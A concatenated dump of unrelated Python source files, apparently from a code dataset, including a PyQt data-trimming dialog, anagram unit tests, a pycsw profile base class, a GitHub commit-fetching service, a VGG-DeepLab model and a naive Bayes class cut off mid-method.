def update_element(self):
self.update_violin()
self.init_vline()
bool_max = self.but_cut_min.isChecked()
bool_min = self.but_cut_max.isChecked()
self.init_slider(h_max=bool_max, h_min=bool_min)
self.update_scatter_data()
def update_violin(self):
self.data_ax.clear()
curr_text = self.cb_cols.currentText()
if self.cb_edgeGrains.isChecked():
corr_data = self.trim_data[self.trim_data['edge'] == 0]
else:
corr_data = self.trim_data
data = corr_data[curr_text]
sns.violinplot(x=data, ax=self.data_ax, cut=0)
self.plt_data.fig.tight_layout()
self.plt_data.draw_idle()
def init_vline(self):
curr_text = self.cb_cols.currentText()
min_val = self.trim_data[curr_text].min()
max_val = self.trim_data[curr_text].max()
self.vline = self.data_ax.axvline(min_val, color='r')
self.vline_max = self.data_ax.axvline(max_val, color='b')
self.plt_data.draw_idle()
def init_slider(self, h_min=False, h_max=False):
sli_min = self.sliderTRIM_min
sli_max = self.sliderTRIM_max
curr_text = self.cb_cols.currentText()
if self.cb_edgeGrains.isChecked():
data = self.trim_data[self.trim_data['edge'] == 0]
else:
data = self.trim_data
min_val = floor(data[curr_text].min())
max_val = ceil(data[curr_text].max())
        # If the midpoint should sit at the start of the data (only the max slider active)
        if h_min and not h_max:
            half_min = min_val
        # If the midpoint should sit at the end of the data (only the min slider active)
        elif h_max and not h_min:
            half_min = max_val
else:
half_min = floor((max_val-min_val)/2)
half_max = half_min + 1
sli_min.setMinimum(min_val)
sli_min.setMaximum(half_min)
if half_min != min_val and half_max != max_val:
if half_min > 10:
ticks = 10
else:
ticks = half_min - min_val
sli_min.setTickInterval(int((half_min-min_val)/ticks))
sli_max.setTickInterval(int((max_val-half_min)/ticks))
sli_max.setMinimum(half_max)
sli_max.setMaximum(max_val)
sli_min.setValue(min_val)
sli_max.setValue(max_val)
self.lab_cut_min.setText(str(min_val))
self.lab_cut_max.setText(str(max_val))
def update_vline_max(self):
act_val = self.sliderTRIM_max.value()
self.vline_max.set_xdata(act_val)
self.plt_data.draw_idle()
self.lab_cut_max.setText(str(act_val))
def update_vline(self):
act_val = self.sliderTRIM_min.value()
self.vline.set_xdata(act_val)
self.plt_data.draw_idle()
self.lab_cut_min.setText(str(act_val))
def load_image(self):
fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Bilddatei laden',
filter='Bilddateien (*.png *.jpeg *.jpg *.bmp)')[0]
        # If the user cancels the file selection dialog
if not fname:
return
img = mpimg.imread(fname)
y_max = img.shape[0]
x_max = img.shape[1]
x_cal = self.trim_data['pos-x'].max()/x_max
y_cal = self.trim_data['pos-y'].max() / y_max
self.cal_val = max(x_cal, y_cal)
self.txt_kalwert.setText(str(self.cal_val))
self.image_ax.imshow(img, origin='upper', extent=None)
self.plt_image.draw_idle()
self.plt_image.fig.tight_layout()
self.show_image_widget()
def update_cal_val(self):
self.cal_val = float(self.txt_kalwert.text())
def show_image_widget(self):
self.imagePlot.show()
def get_excluded_values(self):
data = self.trim_data
thresh_1 = self.sliderTRIM_min.value()
thresh_2 = self.sliderTRIM_max.value()
curr_text = self.cb_cols.currentText()
cond_1 = (data['edge'] == 1)
cond_2 = (data[curr_text] <= thresh_1) | (data[curr_text] >= thresh_2)
if self.cb_edgeGrains.isChecked():
cut_data = data.loc[cond_1 | cond_2]
else:
cut_data = data.loc[cond_2]
x_data = cut_data['pos-x'].values / self.cal_val
y_data = cut_data['pos-y'].values / self.cal_val
return x_data, y_data
def update_scatter_data(self):
x, y = self.get_excluded_values()
self.scat.set_xdata(x)
self.scat.set_ydata(y)
self.plt_image.draw_idle()
def update_data(self):
self.update_vline()
self.update_vline_max()
self.update_scatter_data()
def set_min_slider(self):
try:
val = int(self.lab_cut_min.text())
except ValueError:
BOX.show_error_box('Falscher Wert eingegeben.')
return
self.sliderTRIM_min.setValue(val)
self.update_data()
def set_max_slider(self):
try:
val = int(self.lab_cut_max.text())
except ValueError:
BOX.show_error_box('Falscher Wert eingegeben.')
return
self.sliderTRIM_max.setValue(val)
self.update_data()
def manipulate_max(self):
if self.but_cut_min.isChecked():
self.sliderTRIM_max.hide()
self.lab_cut_max.hide()
self.but_cut_max.hide()
self.init_slider(h_max=True)
else:
self.sliderTRIM_max.show()
self.lab_cut_max.show()
            self.but_cut_max.show()
self.init_slider()
def manipulate_min(self):
if self.but_cut_max.isChecked():
self.sliderTRIM_min.hide()
self.lab_cut_min.hide()
self.but_cut_min.hide()
self.init_slider(h_min=True)
else:
self.sliderTRIM_min.show()
self.lab_cut_min.show()
self.but_cut_min.show()
self.init_slider()
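# Usage sketch (hypothetical, not part of the original module): the dialog
# expects a pandas DataFrame with 'pos-x', 'pos-y' and 'edge' columns plus at
# least one measurement column, and needs a running QApplication.
# if __name__ == "__main__":
#     import sys
#     import pandas as pd
#     app = QtWidgets.QApplication(sys.argv)
#     df = pd.DataFrame({'pos-x': [0.0, 1.0], 'pos-y': [0.0, 1.0],
#                        'edge': [0, 1], 'area': [10.0, 20.0]})
#     dlg = TrimDialog(data=df)
#     dlg.show()
#     sys.exit(app.exec_())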
| 32.812245 | 105 | 0.619729 |
4d4909137a8281abf00add12e7109af6453220fd
| 1,421 |
py
|
Python
|
intro_to_algos_2020_mit/ps3/tests.py
|
venu-gopal-myneni/assignments
|
871148ccaa6291539623fc7d3f9704cb497fbcb6
|
[
"MIT"
] | 1 |
2022-02-26T13:52:31.000Z
|
2022-02-26T13:52:31.000Z
|
assignments/ps3-template/tests.py
|
tallamjr/mit-6006
|
c2aa6bb48edef5800c0779ba2eebd697d44249b5
|
[
"MIT"
] | null | null | null |
assignments/ps3-template/tests.py
|
tallamjr/mit-6006
|
c2aa6bb48edef5800c0779ba2eebd697d44249b5
|
[
"MIT"
] | null | null | null |
import unittest
from count_anagram_substrings import count_anagram_substrings
tests = (
(
(
'esleastealaslatet',
('tesla',),
),
(3,),
),
(
(
'lrldrrrllddrrlllrddd',
('ldl', 'rld'),
),
(1, 3),
),
(
(
'kkkkkvvuvkvkkkvuuvkuukkuvvkukkvkkvuvukuk',
('vkuk', 'uvku', 'kukk'),
),
(5, 6, 1),
),
(
(
'trhtrthtrthhhrtthrtrhhhtrrrhhrthrrrttrrttrthhrrrrtrtthhhhrrrtrtthrttthrthhthrhrh',
('rrrht', 'tttrr', 'rttrr', 'rhrrr'),
),
(6, 5, 6, 1),
),
(
(
'hjjijjhhhihhjjhjjhijjihjjihijiiihhihjjjihjjiijjijjhhjijjiijhjihiijjiiiijhihihhiihhiiihhiijhhhiijhijj',
('jihjhj', 'hhjiii', 'ihjhhh', 'jjjiji'),
),
(10, 6, 2, 2),
),
)
def check(test):
args, staff_sol = test
student_sol = count_anagram_substrings(*args)
return staff_sol == student_sol
class TestCases(unittest.TestCase):
def test_01(self): self.assertTrue(check(tests[ 0]))
def test_02(self): self.assertTrue(check(tests[ 1]))
def test_03(self): self.assertTrue(check(tests[ 2]))
def test_04(self): self.assertTrue(check(tests[ 3]))
def test_05(self): self.assertTrue(check(tests[ 4]))
if __name__ == '__main__':
    res = unittest.main(verbosity=3, exit=False)
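# Reference sketch (an assumption, not the graded solution): the interface the
# tests exercise is count_anagram_substrings(text, patterns) -> tuple of counts,
# which a sliding window of character counts implements in linear time:
# from collections import Counter
# def count_anagram_substrings(t, ss):
#     counts = []
#     for s in ss:
#         k, target = len(s), Counter(s)
#         window = Counter(t[:k])
#         n = int(window == target)
#         for i in range(k, len(t)):
#             window[t[i]] += 1
#             window[t[i - k]] -= 1
#             if window[t[i - k]] == 0:
#                 del window[t[i - k]]  # drop zero entries so Counters compare equal
#             n += window == target
#         counts.append(n)
#     return tuple(counts)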
| 25.375 | 115 | 0.553835 |
422402f1cd18573550063c08ebfde34d14018e34
| 5,187 |
py
|
Python
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 118 |
2015-01-07T00:24:09.000Z
|
2022-03-19T15:35:43.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 319 |
2015-01-06T23:51:46.000Z
|
2022-03-20T11:22:57.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 113 |
2015-01-07T00:42:23.000Z
|
2022-02-19T18:05:08.000Z
|
# -*- coding: utf-8 -*-
# =================================================================
#
# Authors: Tom Kralidis <[email protected]>
# Angelos Tzotsos <[email protected]>
#
# Copyright (c) 2015 Tom Kralidis
# Copyright (c) 2015 Angelos Tzotsos
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import os
import warnings
class Profile(object):
''' base Profile class '''
def __init__(self, name, version, title, url,
namespace, typename, outputschema, prefixes, model, core_namespaces,
added_namespaces,repository):
''' Initialize profile '''
self.name = name
self.version = version
self.title = title
self.url = url
self.namespace = namespace
self.typename = typename
self.outputschema = outputschema
self.prefixes = prefixes
self.repository = repository
if 'DescribeRecord' in model['operations']:
model['operations']['DescribeRecord']['parameters']\
['typeName']['values'].append(self.typename)
model['operations']['GetRecords']['parameters']['outputSchema']\
['values'].append(self.outputschema)
model['operations']['GetRecords']['parameters']['typeNames']\
['values'].append(self.typename)
model['operations']['GetRecordById']['parameters']['outputSchema']\
['values'].append(self.outputschema)
if 'Harvest' in model['operations']:
model['operations']['Harvest']['parameters']['ResourceType']\
['values'].append(self.outputschema)
# namespaces
core_namespaces.update(added_namespaces)
# repository
model['typenames'][self.typename] = self.repository
def extend_core(self, model, namespaces, config):
''' Extend config.model and config.namespaces '''
raise NotImplementedError
def check_parameters(self):
''' Perform extra parameters checking.
Return dict with keys "locator", "code", "text" or None '''
raise NotImplementedError
def get_extendedcapabilities(self):
''' Return ExtendedCapabilities child as lxml.etree.Element '''
raise NotImplementedError
def get_schemacomponents(self):
''' Return schema components as lxml.etree.Element list '''
raise NotImplementedError
def check_getdomain(self, kvp):
'''Perform extra profile specific checks in the GetDomain request'''
raise NotImplementedError
def write_record(self, result, esn, outputschema, queryables):
''' Return csw:SearchResults child as lxml.etree.Element '''
raise NotImplementedError
def transform2dcmappings(self, queryables):
''' Transform information model mappings into csw:Record mappings '''
raise NotImplementedError
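# Subclass sketch (hypothetical profile, for illustration only; assumes the
# passed-in model dict carries the operation keys mutated in Profile.__init__):
# a concrete profile supplies its metadata and overrides the hooks above.
# class MyProfile(Profile):
#     def __init__(self, model, core_namespaces):
#         super().__init__(
#             'my', '1.0', 'My Profile', 'https://example.org/my',
#             'urn:example:my', 'my:Record', 'urn:example:my:1.0',
#             {'my': 'urn:example:my'}, model, core_namespaces,
#             {'my': 'urn:example:my'}, repository={})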
def load_profiles(path, cls, profiles):
''' load CSW profiles, return dict by class name '''
def look_for_subclass(modulename):
module = __import__(modulename)
dmod = module.__dict__
for modname in modulename.split('.')[1:]:
dmod = dmod[modname].__dict__
for key, entry in dmod.items():
if key == cls.__name__:
continue
try:
if issubclass(entry, cls):
aps['plugins'][key] = entry
except TypeError:
continue
aps = {}
aps['plugins'] = {}
aps['loaded'] = {}
for prof in profiles.split(','):
# fgdc, atom, dif, gm03 are supported in core
# no need to specify them explicitly anymore
# provide deprecation warning
# https://github.com/geopython/pycsw/issues/118
if prof in ['fgdc', 'atom', 'dif', 'gm03']:
warnings.warn('%s is now a core module, and does not need to be'
' specified explicitly. So you can remove %s from '
'server.profiles' % (prof, prof))
else:
modulename='%s.%s.%s' % (path.replace(os.sep, '.'), prof, prof)
look_for_subclass(modulename)
return aps
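# Usage sketch (hypothetical path and profile name): load_profiles returns a
# dict whose 'plugins' entry maps class names to discovered Profile subclasses.
# aps = load_profiles(os.path.join('pycsw', 'plugins', 'profiles'),
#                     Profile, 'apiso')
# for name, profile_cls in aps['plugins'].items():
#     print(name, profile_cls)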
| 36.528169 | 78 | 0.630037 |
c47ed8028e53c0742399199be9ea4ca791d59010
| 1,108 |
py
|
Python
|
datahandler/analyser.py
|
ameliecordier/IIK
|
57b40d6b851a1c2369604049d1820e5b572c6227
|
[
"MIT"
] | null | null | null |
datahandler/analyser.py
|
ameliecordier/IIK
|
57b40d6b851a1c2369604049d1820e5b572c6227
|
[
"MIT"
] | null | null | null |
datahandler/analyser.py
|
ameliecordier/IIK
|
57b40d6b851a1c2369604049d1820e5b572c6227
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import csv
from matplotlib import pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
def isValid(p, ep):
return p in ep.patterns
# CLASS ANALYSER
class Analyser:
"""
    Representation of an analysis result
"""
def __init__(self):
"""
        :param results: holds the analysis results
"""
self.results = []
def addResult(self, result):
"""
        Adds a result row to the overall set of results
        :param result: the row of results
:return: None
"""
self.results.append(result)
def __str__(self):
"""
        Display the results on standard output
"""
return "Résultats : %r" % self.results
def toFile(self, filename):
with open(filename, "w") as outfile:
fieldnames = ['idxExpert', 'idxMining', 'pattern expert', 'pattern mining' , 'full pattern']
w = csv.DictWriter(outfile, delimiter=";", fieldnames=fieldnames)
w.writeheader()
w.writerows(self.results)
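if __name__ == "__main__":
    # Minimal usage sketch (assumption: result rows are dicts whose keys match
    # the CSV fieldnames used in toFile).
    analyser = Analyser()
    analyser.addResult({'idxExpert': 0, 'idxMining': 1, 'pattern expert': 'ABC',
                        'pattern mining': 'ACB', 'full pattern': 'ABCACB'})
    print(analyser)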
| 25.181818 | 104 | 0.598375 |
3f28d1e2f76100adc00945a0759d254a0a1638b4
| 20 |
py
|
Python
|
RDS/circle3_central_services/research_manager/src/api/User/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 10 |
2020-06-24T08:22:24.000Z
|
2022-01-13T16:17:36.000Z
|
RDS/circle3_central_services/research_manager/src/api/User/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 78 |
2020-01-23T14:32:06.000Z
|
2022-03-07T14:11:16.000Z
|
RDS/circle3_central_services/research_manager/src/api/User/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 1 |
2020-06-24T08:33:48.000Z
|
2020-06-24T08:33:48.000Z
|
from .user import *
| 20 | 20 | 0.7 |
3f418694dc8e68bdf0bfc91861f5c5eb0502eab0
| 5,495 |
py
|
Python
|
src/onegov/search/dsl.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/search/dsl.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/search/dsl.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from elasticsearch_dsl import Search as BaseSearch
from elasticsearch_dsl.response import Hit as BaseHit
from elasticsearch_dsl.response import Response as BaseResponse
def type_from_hit(hit):
return hit.meta.index.split('-')[-2]
class Search(BaseSearch):
""" Extends elastichsearch_dsl's search object with ORM integration.
Works exactly the same as the original, but the results it returns offer
additional methods to query the SQLAlchemy models behind the results (if
any).
"""
def __init__(self, *args, **kwargs):
        # get the session and mapping if possible (not provided during cloning)
self.session = kwargs.pop('session', None)
self.mappings = kwargs.pop('mappings', None)
super().__init__(*args, **kwargs)
# bind responses to the orm
self._response_class = Response.bind(
self.session, self.mappings, self.explain)
@property
def explain(self):
return self._extra.get('explain', False)
def _clone(self):
search = super()._clone()
search.session = self.session
search.mappings = self.mappings
return search
def _get_result(self, *args, **kwargs):
result = super()._get_result(*args, **kwargs)
result.__class__ = Hit.bind(
session=self.session,
model=self.mappings[type_from_hit(result)].model
)
return result
class Response(BaseResponse):
""" Extends the default response (list of results) with additional
methods to query the SQLAlchemy models behind the results.
"""
@classmethod
def bind(cls, session, mappings, explain):
class BoundResponse(cls):
pass
BoundResponse.session = session
BoundResponse.mappings = mappings
BoundResponse.explain = explain
return BoundResponse
def hits_by_type(self, type):
for hit in self.hits:
if type_from_hit(hit) == type:
yield hit
def query(self, type):
""" Returns an SQLAlchemy query for the given type. You must provide
a type, because a query can't consist of multiple unrelated tables.
If no results match the type, None is returned.
"""
hits = list(self.hits_by_type(type))
if not hits:
return None
model = self.mappings[type].model
query = self.session.query(model)
model_ids = (h.meta.id for h in hits)
query = query.filter(getattr(model, model.es_id).in_(model_ids))
return query
def load(self):
""" Loads all results by querying the SQLAlchemy session in the order
they were returned by elasticsearch.
Note that the resulting lists may include None values, since we are
might get elasticsearch results for which we do not have a model
on the database (the data is then out of sync).
"""
positions = {}
types = set()
# put the types into buckets and store the original position...
for ix, hit in enumerate(self.hits):
type = type_from_hit(hit)
positions[(type, str(hit.meta.id))] = ix
types.add(type)
results = [None] * len(positions)
# ...so we can query the database once per type and not once per result
# this has the potential of resulting in fewer queries
for type in types:
for result in self.query(type):
object_id = str(getattr(result, result.es_id))
ix = positions[(type, object_id)]
if self.explain:
ex = self.hits[ix].meta.explanation
result.explanation = {
'raw': ex.__dict__,
'score': self.hits[ix].meta.score,
'term-frequency': explanation_value(
ex, 'termFreq'
),
'inverse-document-frequency': explanation_value(
ex, 'idf'
),
'field-norm': explanation_value(
ex, 'fieldNorm'
)
}
results[ix] = result
return results
def explanation_value(explanation, text):
""" Gets the value from the explanation for descriptions starting with
the given text.
"""
if explanation.description.startswith(text):
return {
'description': explanation.description,
'value': explanation.value
}
for detail in getattr(explanation, 'details', []):
result = explanation_value(detail, text)
if result:
return result
class Hit(BaseHit):
""" Extends a single result with additional methods to query the SQLAlchemy
models behind the results.
"""
@classmethod
def bind(cls, model, session):
class BoundHit(cls):
pass
BoundHit.model = model
BoundHit.session = session
return BoundHit
def query(self):
""" Returns the SQLAlchemy query for this result. """
query = self.session.query(self.model)
model_id = getattr(self.model, self.model.es_id)
query = query.filter(model_id == self.meta.id)
return query
def load(self):
""" Loads this result from the SQLAlchemy session. """
return self.query().one()
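# Usage sketch (hypothetical client/session/mappings objects): a Search bound
# to an ORM session yields responses whose hits load back as SQLAlchemy models.
# s = Search(using=es_client, index='documents-*',
#            session=sqlalchemy_session, mappings=type_mappings)
# response = s.query('match', title='foo').execute()
# models = response.load()  # SQLAlchemy objects, in elasticsearch order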
| 28.471503 | 79 | 0.589263 |
3f4d7a70b7445e8fd4a01a87b193501aed45d294
| 2,944 |
py
|
Python
|
PyStellar/stellar/Git/service/git_commit_service.py
|
psgstellar/Stellar
|
947d4b3d9d6b9c74d4c9ebd29683793a8d86fad2
|
[
"Apache-2.0"
] | 3 |
2021-01-24T17:07:55.000Z
|
2021-02-20T20:11:13.000Z
|
PyStellar/stellar/Git/service/git_commit_service.py
|
psgstellar/Stellar
|
947d4b3d9d6b9c74d4c9ebd29683793a8d86fad2
|
[
"Apache-2.0"
] | 61 |
2021-01-10T12:59:01.000Z
|
2021-06-24T09:19:20.000Z
|
PyStellar/stellar/Git/service/git_commit_service.py
|
psgstellar/Stellar
|
947d4b3d9d6b9c74d4c9ebd29683793a8d86fad2
|
[
"Apache-2.0"
] | 1 |
2021-01-14T05:23:32.000Z
|
2021-01-14T05:23:32.000Z
|
import requests
import dateutil.parser
import pytz
from Git.dao.git_dao import GitOwnerRepo
class GitCommitCheckService:
"""Github Public 저장소 커밋 기록 가져오기"""
@classmethod
def git_public_request(cls, request):
"""Commit 기록 요청"""
owner = request.GET['owner']
repo = request.GET['repo']
token = request.GET['token']
if request.GET.get('since', '') and request.GET.get('until', ''):
since = request.GET['since']
until = request.GET['until']
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}&since={since}&until={until}', headers={'Authorization': 'token '+token})
elif request.GET.get('since', ''):
since = request.GET['since']
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}&since={since}', headers={'Authorization': 'token '+token})
elif request.GET.get('until', ''):
until = request.GET['until']
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}&until={until}', headers={'Authorization': 'token '+token})
else:
r = requests.get(f'https://api.github.com/repos/{owner}/{repo}/commits?my_client_id={owner}', headers={'Authorization': 'token '+token})
data = r.json()
commit_json = None
commit_info = [None] * 4
        if isinstance(data, list):
            if data:
local_timezone = pytz.timezone('Asia/Seoul')
commit_json = []
for i in data:
for k, v in i.items():
if k == 'commit':
commit_info[1] = v['message']
commit_info[2] = (dateutil.parser.parse(v['author']['date'])).replace(tzinfo=pytz.utc).astimezone(local_timezone)
elif k == 'author':
commit_info[0] = v['login']
elif k == 'html_url':
commit_info[3] = v
commit_json.append({'username': commit_info[0],
'message': commit_info[1],
'date': commit_info[2],
'url': commit_info[3]})
else:
commit_json = [{'username': owner, 'message': 'Fault Token Info OR Repo Info', 'date': None, 'url': None}]
return commit_json
@classmethod
def git_commit_insert(cls, commit_list):
""" 깃 커밋 리스트를 디비에 저장"""
list_tuple = []
for i in commit_list:
list_tuple.append(tuple(i.values()))
insert_commit = GitOwnerRepo()
return_json = insert_commit.insert_git_commit(list_tuple)
return return_json
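# Usage sketch (hypothetical Django request carrying GET parameters): the
# service expects 'owner', 'repo' and 'token', with optional 'since'/'until'.
# commits = GitCommitCheckService.git_public_request(request)
# GitCommitCheckService.git_commit_insert(commits)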
| 43.940299 | 176 | 0.52038 |
58c4179e5713c05abfe6169f74df8cd9ca6987a4
| 5,558 |
py
|
Python
|
model/vgg_deeplab.py
|
ireina7/zero-shot-segmentation
|
870d08ad7ea3965f006d0eb44667f6ecd87ef205
|
[
"MIT"
] | null | null | null |
model/vgg_deeplab.py
|
ireina7/zero-shot-segmentation
|
870d08ad7ea3965f006d0eb44667f6ecd87ef205
|
[
"MIT"
] | null | null | null |
model/vgg_deeplab.py
|
ireina7/zero-shot-segmentation
|
870d08ad7ea3965f006d0eb44667f6ecd87ef205
|
[
"MIT"
] | null | null | null |
import torchvision
import torch
import torch.nn as nn
import torch.nn.functional as F
class Vgg_Deeplab(nn.Module):
def __init__(self,*args, **kwargs):
super(Vgg_Deeplab, self).__init__()
vgg16 = torchvision.models.vgg16()
layers = []
layers.append(nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=2, padding=1))
layers.append(nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=2, padding=1))
layers.append(nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=2, padding=1))
layers.append(nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=1, padding=1))
layers.append(nn.Conv2d(512,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Conv2d(512,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.MaxPool2d(3, stride=1, padding=1))
self.features = nn.Sequential(*layers)
classifier = []
classifier.append(nn.AvgPool2d(3, stride=1, padding=1))
classifier.append(nn.Conv2d(512,
1024,
kernel_size=3,
stride=1,
padding=12,
dilation=12))
classifier.append(nn.ReLU(inplace=True))
classifier.append(nn.Dropout(p=0.5))
self.classifier = nn.Sequential(*classifier)
self.init_weights()
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
def init_weights(self):
vgg = torchvision.models.vgg16(pretrained=True)
state_vgg = vgg.features.state_dict()
self.features.load_state_dict(state_vgg)
for ly in self.classifier.children():
if isinstance(ly, nn.Conv2d):
nn.init.kaiming_normal_(ly.weight, a=1)
nn.init.constant_(ly.bias, 0)
def get_1x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
# b = []
#
# b.append(self.conv1)
# b.append(self.bn1)
# b.append(self.layer1)
# b.append(self.layer2)
# b.append(self.layer3)
# b.append(self.layer4)
for i in self.features:
#for j in self.features[i].modules():
jj = 0
for k in i.parameters():
jj += 1
if k.requires_grad:
yield k
def optim_parameters_1x(self, args):
return [{"params": self.get_1x_lr_params(), "lr": 1 * args.learning_rate}]
def get_10x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
# b = []
# b.append(self.layer.parameters())
for i in self.classifier:
#for j in self.classifier[i].modules():
jj = 0
for k in i.parameters():
jj += 1
if k.requires_grad:
yield k
def optim_parameters_10x(self, args):
return [{"params": self.get_10x_lr_params(), "lr": 10 * args.learning_rate}]
if __name__ == "__main__":
net = Vgg_Deeplab(3, 10)
in_ten = torch.randn(1, 3, 224, 224)
out = net(in_ten)
print(net)
print(out.size())
in_ten = torch.randn(1, 3, 64, 64)
mod = nn.Conv2d(3,
512,
kernel_size=3,
stride=1,
padding=2,
dilation=2)
out = mod(in_ten)
print(out.shape)
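    # Illustrative sketch (an addition, not from the original file): combine
    # both parameter groups in one optimizer; `_Args` is a stand-in for the
    # real argparse namespace with a `learning_rate` attribute.
    class _Args:
        learning_rate = 1e-3
    optimizer = torch.optim.SGD(
        net.optim_parameters_1x(_Args) + net.optim_parameters_10x(_Args),
        lr=1e-3, momentum=0.9)
    print(optimizer)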
| 35.858065 | 84 | 0.526268 |
58dc98f64796c7f6f0664ca055829713dcb9192e
| 3,662 |
py
|
Python
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 1,107 |
2016-09-21T02:18:36.000Z
|
2022-03-29T02:52:12.000Z
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 18 |
2016-12-22T10:24:47.000Z
|
2022-03-11T23:18:43.000Z
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 776 |
2016-12-21T12:08:08.000Z
|
2022-03-21T06:12:08.000Z
|
import numpy as np
from sklearn.preprocessing import OneHotEncoder
class MultinomialNB:
""" Naive Bayes algorithm with discrete inputs
Parameters
----------
alpha : float, optional (default=1.)
Smooth parameter used in Naive Bayes, default is 1 (which indicates a laplace smoothing)
Attributes
----------
enc : OneHotEncoder
One-Hot encoder used to transform (discrete) inputs
class_log_prior : np.ndarray of float
Log class prior used to calculate (linear) prediction
feature_log_prob : np.ndarray of float
Feature log probability used to calculate (linear) prediction
Examples
--------
>>> import numpy as np
>>> x = np.random.randint(0, 10, [1000, 10]) # Generate feature vectors
>>> y = np.random.randint(0, 5, 1000) # Generate labels
>>> nb = MultinomialNB().fit(x, y) # fit the model
>>> nb.predict(x) # (linear) prediction
>>> nb.predict_class(x) # predict labels
"""
def __init__(self, alpha=1.):
self.alpha = alpha
self.enc = self.class_log_prior = self.feature_log_prob = None
def fit(self, x, y, do_one_hot=True):
""" Fit the model with x & y
Parameters
----------
x : {list of float, np.ndarray of float}
Feature vectors used for training
Note: features are assumed to be discrete
y : {list of float, np.ndarray of float}
Labels used for training
do_one_hot : bool, optional (default=True)
Whether do one-hot encoding on x
Returns
-------
self : MultinomialNB
Returns self.
"""
if do_one_hot:
self.enc = OneHotEncoder(dtype=np.float32)
x = self.enc.fit_transform(x)
else:
self.enc = None
x = np.array(x, np.float32)
n = x.shape[0]
y = np.array(y, np.int8)
self.class_log_prior = np.log(np.bincount(y) / n)
